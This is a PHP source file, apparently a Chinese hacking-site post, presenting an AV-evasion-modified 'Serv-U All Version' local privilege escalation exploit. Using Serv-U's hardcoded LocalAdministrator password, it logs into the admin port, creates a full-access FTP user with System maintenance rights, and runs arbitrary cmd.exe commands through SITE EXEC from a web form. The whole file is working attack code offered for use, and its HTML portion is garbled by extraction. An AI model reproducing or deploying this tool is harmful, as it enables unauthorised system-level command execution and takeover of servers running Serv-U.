PHP代码
- /**
- 修改免杀版本 BY:CiKer
- **/
- //
- //Codez begin
- //
- //判断magic_quotes_gpc的值
- set_time_limit(0);
- if (get_magic_quotes_gpc()) {
- $_GET = stripslashes_array($_GET);
- }
- //变量初始化
- $addr = ‘127.0.0.1’;
- $ftpport = 21;
- $adminport = 43958;
- $adminuser = ‘LocalAdministrator’;
- $adminpass = ‘#l@$ak#.lk;0@P’;
- $user = ‘110’;
- $password = ‘110’;
- $homedir = ‘C:\\';
- $dir = ‘C:\\WINNT\\System32\\‘;
- //有改变则赋值
- if ($_GET){
- $addr = $_GET['addr'] ;
- $ftpport = $_GET['ftpport'] ;
- $adminport = $_GET['adminport'] ;
- $adminuser = $_GET['adminuser'] ;
- $adminpass = $_GET['adminpass'] ;
- $user = $_GET['user'] ;
- $password = $_GET['password'] ;
- $homedir = $_GET['homedir'] ;
- if ($_GET['dir']){
- $dir = $_GET['dir'] ;
- }
- }
- ?>
-
-= =- - b {font-family : Verdana, sans-serif;font-size : 14px;}
- body,td,p,pre {
- font-family : Verdana, sans-serif;font-size : 12px;
- }
- input {
- font-family: "Verdana";
- font-size: "11px";
- BACKGROUND-COLOR: "#FFFFFF";
- height: "18px";
- border: "1px solid #666666";
- }
-
Serv-U All Version本地提升权限Exp10it Ver 1.5 -
- 添加Serv-U用户部分
-
-
主机IP: "> 主机Ftp端口: "> 主机Ftp管理端口: "> 主机Ftp管理用户: "> 主机Ftp管理密码: "> 添加的用户名: "> 添加的用户名密码: "> 用户主目录(别忘了写"\"): "> -
- //添加用户
- if ($_GET['action']=="up"){
- up($addr,$ftpport,$adminport,$adminuser,$adminpass,$user,$password,$homedir);
- }
- ?>
-
-
执行命令部分 -
主机Ftp端口: "> 用户名: "> 用户名密码: "> 系统路径(别忘了写"\"): "> 执行的命令: cmd']?>">
- //执行命令
- if ($_GET['action']=="execute"){
- ftpcmd($ftpport,$user,$password,$dir,$_GET['cmd']);
- }
- ?>
-
-
Copycenter (C) 2004 我非我 All centers Reserved. 免杀修改 BY:CiKer 从此Hacking的道路更宽敞了… - //添加用户主函数定义
- function up($addr,$ftpport,$adminport,$adminuser,$adminpass,$user,$password,$homedir){
- $fp = fsockopen ("127.0.0.1", $adminport, $errno, $errstr, 8);
- if (!$fp) {
-
echo "$errstr ($errno)
\n"; - } else {
- fputs ($fp, "USER ".$adminuser."");
- sleep (1);
- fputs ($fp, "PASS ".$adminpass."");
- sleep (1);
- fputs ($fp, "SITE MAINTENANCE");
- sleep (1);
- fputs ($fp, "-SETUSERSETUP");
- fputs ($fp, "-IP=".$addr."");
- fputs ($fp, "-PortNo=".$ftpport."");
- fputs ($fp, "-User=".$user."");
- fputs ($fp, "-Password=".$password."");
- fputs ($fp, "-HomeDir=".$homedir."");
- fputs ($fp, "-LoginMesFile=");
- fputs ($fp, "-Disable=0");
- fputs ($fp, "-RelPaths=0");
- fputs ($fp, "-NeedSecure=0");
- fputs ($fp, "-HideHidden=0");
- fputs ($fp, "-AlwaysAllowLogin=0");
- fputs ($fp, "-ChangePassword=1");
- fputs ($fp, "-QuotaEnable=0");
- fputs ($fp, "-MaxUsersLoginPerIP=-1");
- fputs ($fp, "-SpeedLimitUp=-1");
- fputs ($fp, "-SpeedLimitDown=-1");
- fputs ($fp, "-MaxNrUsers=-1");
- fputs ($fp, "-IdleTimeOut=600");
- fputs ($fp, "-SessionTimeOut=-1");
- fputs ($fp, "-Expire=0");
- fputs ($fp, "-RatioUp=1");
- fputs ($fp, "-RatioDown=1");
- fputs ($fp, "-RatiosCredit=0");
- fputs ($fp, "-QuotaCurrent=0");
- fputs ($fp, "-QuotaMaximum=0");
- fputs ($fp, "-Maintenance=System");
- fputs ($fp, "-PasswordType=Regular");
- fputs ($fp, "-Ratios=None");
- fputs ($fp, " Access=".$homedir."|RWAMELCDP");
- fputs ($fp, "QUIT");
- sleep (1);
- while (!feof($fp)) {
- echo fgets ($fp,128);
- }
- }
- }
- //执行命令主函数定义
- function ftpcmd($ftpport,$user,$password,$dir,$cmd){
- $conn_id = fsockopen ("127.0.0.1", $ftpport, $errno, $errstr, 8);
- if (!$conn_id) {
-
echo "$errstr ($errno)
\n"; - } else {
- fputs ($conn_id, "USER ".$user."");
- sleep (1);
- fputs ($conn_id, "PASS ".$password."");
- sleep (1);
- fputs ($conn_id, "SITE EXEC ".$dir."cmd.exe /c ".$cmd."");
- fputs ($conn_id, "QUIT");
- sleep (1);
- while (!feof($conn_id)) {
- echo fgets ($conn_id,128);
- }
- fclose($conn_id);
- }
- }
- //去除转义字符
- function stripslashes_array(&$array) {
- while (list($key,$var) = each($array)) {
- if ($key != ‘argc‘ && $key != ‘argv‘ && (strtoupper($key) != $key || ‘‘.intval($key) == "$key")) {
- if (is_string($var)) {
- $array[$key] = stripslashes($var);
- }
- if (is_array($var)) {
- $array[$key] = stripslashes_array($var);
- }
- }
- }
- return $array;
- }
- ?>